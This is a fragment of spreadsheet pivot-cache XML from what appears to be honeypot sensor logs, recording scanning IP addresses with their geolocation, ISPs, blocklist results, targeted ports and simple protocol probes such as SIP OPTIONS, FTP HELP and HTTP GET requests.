    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de7f:cbb6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="160"/>
    <x v="160"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:40:02"/>
    <d v="2025-04-30T13:40:02"/>
    <d v="2025-04-30T13:40:02"/>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3d01:8e1a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="161"/>
    <x v="161"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:35:48"/>
    <d v="2025-02-19T14:01:22"/>
    <d v="2025-04-30T13:35:48"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="67"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.2289200000000005"/>
    <s v="106.847"/>
    <s v="58369"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="residential"/>
    <s v="PT Asuransi Takaful Umum"/>
    <s v="2023-10-03"/>
    <s v="IDNIC-TAKAFULUMUM-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,49446)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,65178)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,57490)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,65020)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,56216)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67e0:494e"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="162"/>
    <x v="162"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:22:26"/>
    <d v="2025-04-30T13:22:26"/>
    <d v="2025-04-30T13:22:26"/>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df:198b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="163"/>
    <x v="163"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:11:08"/>
    <d v="2024-04-10T11:20:00"/>
    <d v="2025-04-30T13:11:08"/>
    <n v="94"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy'&amp;&amp; 'attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H43&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;24007&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="22"/>
    <s v="Sofia-grad"/>
    <s v="Sofia"/>
    <s v="Sofia (g.k. Iztok)"/>
    <s v="727011"/>
    <s v="1000"/>
    <s v="42.6636"/>
    <s v="23.3575"/>
    <s v="8717"/>
    <s v="A1 Bulgaria EAD"/>
    <s v="Spectrum"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d45b:a1a2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="164"/>
    <x v="164"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T13:10:22"/>
    <d v="2023-09-01T13:35:00"/>
    <d v="2025-04-30T13:10:22"/>
    <n v="968"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_MYSQL_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;3306&amp;&amp;21&amp;&amp;48649&amp;&amp;80&amp;&amp;6379&amp;&amp;110&amp;&amp;5432&amp;&amp;33524&amp;&amp;143&amp;&amp;NA&amp;&amp;56011&amp;&amp;1080&amp;&amp;5900&amp;&amp;44704&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=152.32.159.79;rport=43729'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=152.32.159.79;rport=40103'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9820:9f4f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="165"/>
    <x v="165"/>
    <s v="NA&amp;&amp;transformative.monitoring.internet-measurement.com"/>
    <x v="0"/>
    <d v="2025-04-30T12:50:04"/>
    <d v="2024-03-27T16:18:02"/>
    <d v="2025-04-30T12:50:04"/>
    <n v="445"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_SIP_H3&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_IRC_H13&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_REDIS_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;6379&amp;&amp;6667&amp;&amp;9100&amp;&amp;110&amp;&amp;5432&amp;&amp;443&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;445&amp;&amp;389&amp;&amp;22531&amp;&amp;143&amp;&amp;3306&amp;&amp;1433&amp;&amp;1521&amp;&amp;25&amp;&amp;3389"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2005-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2021-11-25 11:34:08"/>
    <s v="2029-11-25 11:34:08"/>
    <s v="2024-10-10 09:48:31"/>
    <s v="['ALEXIS.NS.CLOUDFLARE.COM', 'RUTH.NS.CLOUDFLARE.COM']"/>
    <s v="NAMECHEAP INC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="3"/>
    <s v="NA"/>
    <s v="Kalkofnsvegur 2"/>
    <s v="::ffff:57ec:b005"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="166"/>
    <x v="166"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:43:04"/>
    <d v="2024-12-16T15:32:56"/>
    <d v="2025-04-30T12:43:04"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Varanasi"/>
    <s v="Varanasi (Gurūbāgh)"/>
    <s v="1253405"/>
    <s v="221002"/>
    <s v="25.3048"/>
    <s v="82.9938"/>
    <s v="134908"/>
    <s v="IKON BROADBAND PRIVATE LIMITED"/>
    <s v="Ikon Broadband Private Limited"/>
    <s v="residential"/>
    <s v="Ikon Broadband Private Limited"/>
    <s v="2016-04-13"/>
    <s v="IKONBROADBAND"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d6:bc49"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="167"/>
    <x v="167"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:28:38"/>
    <d v="2025-04-29T16:13:19"/>
    <d v="2025-04-30T12:28:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="2008-07-25"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:cf26"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="168"/>
    <x v="168"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:23:13"/>
    <d v="2025-04-30T12:23:13"/>
    <d v="2025-04-30T12:23:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2f5:95b4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="169"/>
    <x v="169"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:19:10"/>
    <d v="2024-11-27T07:57:59"/>
    <d v="2025-04-30T12:19:10"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="1433&amp;&amp;53724&amp;&amp;26780"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f2:9cc6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="170"/>
    <x v="170"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:16:11"/>
    <d v="2025-04-30T12:15:27"/>
    <d v="2025-04-30T12:16:11"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Spsr Nellore"/>
    <s v="Nellore"/>
    <s v="1261529"/>
    <s v="524001"/>
    <s v="14.4499"/>
    <s v="79.987"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Communication Ltd"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f7:65aa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="171"/>
    <x v="171"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:11:57"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T12:11:57"/>
    <n v="314"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;59899&amp;&amp;143&amp;&amp;443&amp;&amp;21&amp;&amp;110&amp;&amp;9100&amp;&amp;1433&amp;&amp;3306&amp;&amp;23&amp;&amp;445&amp;&amp;5432&amp;&amp;NA&amp;&amp;3389&amp;&amp;25&amp;&amp;80&amp;&amp;45186&amp;&amp;38241"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
